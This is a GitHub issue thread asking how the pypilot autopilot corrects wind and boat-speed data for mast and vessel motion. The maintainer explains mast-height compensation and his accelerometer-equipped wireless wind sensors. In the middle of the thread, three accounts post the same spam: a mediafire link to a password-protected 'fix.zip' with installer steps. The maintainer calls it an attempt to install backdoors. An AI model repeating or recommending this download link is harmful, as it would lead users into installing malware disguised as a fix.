pypilot/pypilot #240: Question: Correcting Wind and STW for vessel motion?

rgleason, 2024-08-26:
That wind indicator is on a long arm (mast height + wand) waving around changing the wind data vectors and magnitude. This data is used for sailing to the wind and thus it can dramatically affect an autopilot.

It appears (not confirmed) that the newer B&G NAC  and the Raymarine EV may only be using the newer more accurate compasses for heading information and  "pitch and yaw" and the  PGN 12725 may not be used to  compensate (wind speed and direction, and speed through the water (STW) for vessel motion. 

I can really understand how bad yaw in waves would screw up wind data (same for STW to a lesser degree). Pitch is not quite as much of a factor, but it would also affect the vectors and magnitude for both instruments. 

I realize that there is a concurrency problem in correcting wind (and STW) because the separate ships compass sensor sends data at a certain interval and the wind instrument sends it at a different time. What is needed is a wind instrument with an accurate compass that has pitch and yaw, and that data is processed in the wind instrument itself so that the wind data being sent is corrected for vessel motion (same for STW).

How does pypilot address correction of wind and STW for vessel motion?
How would you do this?

JONTY650413, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

CosionMa, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

rgleason, 2024-08-26:
What? @CosionMa @JONTY650413  do you want me to report spam?

rgleason, 2024-08-26:
Spammed

closed 2024-08-26 by rgleason

xiaobai-marker, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seandepagnier, 2024-08-26:
gah what a bunch of evil crap.  Do not install those files they are trying to put backdoors on you

seandepagnier, 2024-08-26:
so pypilot has an option to compensate the wind sensors if you give it the mast height.   By default this is 0 and no compensation is performed.

Next,  I have developed wireless wind sensors.   My sensors have less friction than others, and are completely contact free so will never wear out.    

   My wind sensors have accelerometers built into them.  Perhaps they should have gyros too, but anyway, there is an option to use the accelerometer in the sensor to compensate it.   This is not really proven yet.   My sensors also support multiple wind sensors for example port and starboard.   This way you can mount them lower down on the rail, and it will automatically use the windward sensor.